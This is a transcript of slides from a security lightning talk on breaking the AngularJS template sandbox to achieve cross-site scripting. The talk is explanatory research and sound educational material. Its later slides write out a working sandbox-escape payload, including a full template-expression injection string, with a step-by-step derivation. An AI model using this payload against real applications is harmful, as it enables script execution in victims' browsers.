Breaking AngularJS Javascript sandbox
DESCRIPTION
Lightning talk by avlidienbrunn on how to break the AngularJS sandbox and more or less XSS every AngularJS app out there (slight e
TRANSCRIPT
![Page 1: Breaking AngularJS Javascript sandbox](https://reader038.vdocuments.us/reader038/viewer/2022100600/55660884d8b42a06318b463c/html5/thumbnails/1.jpg)
Breaking AngularJS Javascript sandbox
A lightning talk by avlidienbrunn
![Page 2: Breaking AngularJS Javascript sandbox](https://reader038.vdocuments.us/reader038/viewer/2022100600/55660884d8b42a06318b463c/html5/thumbnails/2.jpg)
What is AngularJS? And where’s the sandbox?
• Javascript framework for building single page web applications.
• Mustache style templates: having <h1>{{1+2+3}}</h1> anywhere in an Angular HTML app will render <h1>6</h1>
• Template expressions are evaluated as Javascript
• Template expression Javascript is sandboxed: it can’t reach [object Window] or the DOM
• If we could access dangerous objects from templates, we could XSS any AngularJS app that prints user data in Angular bound HTML
![Page 3: Breaking AngularJS Javascript sandbox](https://reader038.vdocuments.us/reader038/viewer/2022100600/55660884d8b42a06318b463c/html5/thumbnails/3.jpg)
Executing JS… From JS
• eval() - Unavailable under window
• document.write - Unavailable under document
• location="javascript:" - Unavailable under document
• Function("code")() - Unavailable under blacklist
• What else is there?
![Page 4: Breaking AngularJS Javascript sandbox](https://reader038.vdocuments.us/reader038/viewer/2022100600/55660884d8b42a06318b463c/html5/thumbnails/4.jpg)
The bypass

toString.constructor.prototype.toString=toString.constructor.prototype.call;["a","alert(1)"].sort(toString.constructor)

alert(1)
![Page 5: Breaking AngularJS Javascript sandbox](https://reader038.vdocuments.us/reader038/viewer/2022100600/55660884d8b42a06318b463c/html5/thumbnails/5.jpg)
The how

["a","alert(1)"].sort(Function);

Array.prototype.sort calls the compare function on pairs of elements and branches on its result:

if(compareFunction(element1, element2) == 1){ //sort element as bigger }else if(… == 0){ //sort element as same }else{ //sort element as smaller }

With Function as the compare function, the call is Function("a", "alert(1)"), which builds a new function whose parameter is "a" and whose body is "alert(1)":

if(Function("a", "alert(1)") == 1){ //sort element as bigger }else if(… == 0){ //sort element as same }else{ //sort element as smaller }

if((function(a){alert(1)}) == 1){ //sort element as bigger }else if(… == 0){ //sort element as same }else{ //sort element as smaller }

Comparing that function against a number coerces it to a primitive, which means calling its toString():

if((function(a){alert(1)}).toString() == 1..toString()){ //sort element as bigger }else if(… == 0){ //sort element as same }else{ //sort element as smaller }

Overwrite Function.prototype.toString with Function.prototype.call and the same coercion now invokes the function instead of stringifying it:

toString.constructor.prototype.toString= toString.constructor.prototype.call; if((function(a){alert(1)}).call() == 1..toString()){ //sort element as bigger }else if(… == 0){ //sort element as same }else{ //sort element as smaller }

Inside the sandbox the Function constructor is not in scope by name, but toString (inherited by the scope object) is, and toString.constructor is Function:

["a","alert(1)"].sort(toString.constructor);

The whole thing as a template expression:

{{toString.constructor.prototype.toString=toString.constructor.prototype.call;["a","alert(1)"].sort(toString.constructor)}}

alert(1)
![Page 6: Breaking AngularJS Javascript sandbox](https://reader038.vdocuments.us/reader038/viewer/2022100600/55660884d8b42a06318b463c/html5/thumbnails/6.jpg)
That’s all folks!
A lightning talk by avlidienbrunn